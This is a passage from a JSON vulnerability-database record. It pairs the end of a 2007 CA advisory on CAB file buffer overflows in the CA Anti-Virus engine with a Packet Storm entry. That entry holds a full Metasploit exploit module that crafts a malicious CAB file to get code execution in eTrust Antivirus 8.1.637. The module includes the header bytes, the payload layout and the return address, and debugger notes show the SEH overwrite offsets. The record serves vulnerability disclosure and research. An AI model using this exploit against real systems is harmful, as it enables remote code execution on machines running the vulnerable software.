products implementing the Anti-Virus engine\r\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp\r\nCA Security Advisor posting: CA Anti-Virus Engine CAB File Buffer \r\nOverflow Vulnerabilities\r\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680\r\nCAID: 35395, 35396\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396\r\nReported By: ZDI\r\nZDI Advisory: ZDI-07-034, ZDI-07-035\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-034.html\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-035.html\r\nCVE References: CVE-2007-2863, CVE-2007-2864\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2863\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864\r\nOSVDB References: OSVDB-35244, OSVDB-35245\r\nhttp://osvdb.org/35244\r\nhttp://osvdb.org/35245\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA\r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory, \r\nplease send email to vuln AT ca DOT com.\r\n\r\nIf you discover a vulnerability in CA products, please report your\r\nfindings to vuln AT ca DOT com, or utilize our &quot;Submit a \r\nVulnerability&quot; form. \r\nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, 1 CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www.ca.com/us/contact/\r\nLegal Notice http://www.ca.com/us/legal/\r\nPrivacy Policy http://www.ca.com/us/privacy/\r\nCopyright &#40;c&#41; 2007 CA. All rights reserved.", "edition": 1, "modified": "2007-06-11T00:00:00", "published": "2007-06-11T00:00:00", "id": "SECURITYVULNS:DOC:17209", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17209", "title": "[CAID 35395, 35396]: CA Anti-Virus Engine CAB File Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:09", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "CA Antivirus Engine CAB Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83164", "href": "https://packetstormsecurity.com/files/83164/CA-Antivirus-Engine-CAB-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/projects/Framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA Antivirus Engine CAB Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in CA eTrust Antivirus 8.1.637. \nBy creating a specially crafted CAB file, an an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'BID', '24330' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-035.html' ], \n[ 'CVE', '2007-2864' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 250, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)', { 'Ret' => 0x6dc886ea } ], # inocore.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 05 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'msf.cab']), \n], self.class) \n \nend \n \ndef exploit \n \ncab_header = \"\\x4D\\x53\\x43\\x46\\x00\\x00\\x00\\x00\\xC4\\x0D\\x00\\x00\\x00\\x00\\x00\\x00\" \ncab_header << \"\\x2C\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x01\\x01\\x00\\x01\\x00\\x00\\x00\" \ncab_header << \"\\xD2\\x04\\x00\\x00\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x78\\x0D\\x00\\x00\" \ncab_header << \"\\x00\\x00\\x00\\x00\\x00\\x00\\xE2\\x36\\x53\\xAD\\x20\\x00\" \n \nsploit = make_nops(268 - payload.encoded.length) + payload.encoded \nsploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') \nsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-260\").encode_string \nsploit << make_nops(800) \n \ncab = cab_header + sploit \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nfile_create(cab) \n \nend \n \nend \n \n=begin \n0:001> !exchain \n00cdf1b0: VetE!InoAvpackDat+ca058 (600d19c8) \n00cdf2fc: 316a4130 \nInvalid exception stack at 6a413969 \n0:001> !pattern_offset 1024 0x6a413969 \n[Byakugan] Control of 0x6a413969 at offset 268. \n0:001> !pattern_offset 1024 0x316a4130 \n[Byakugan] Control of 0x316a4130 at offset 272. \n0:001> u 0x6dc886ea L3 \nINOCORE!QSIInitQSysInfo+0x278a: \n6dc886ea 5f pop edi \n6dc886eb 5e pop esi \n6dc886ec c3 ret \n=end \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83164/ca_cab.rb.txt"}]}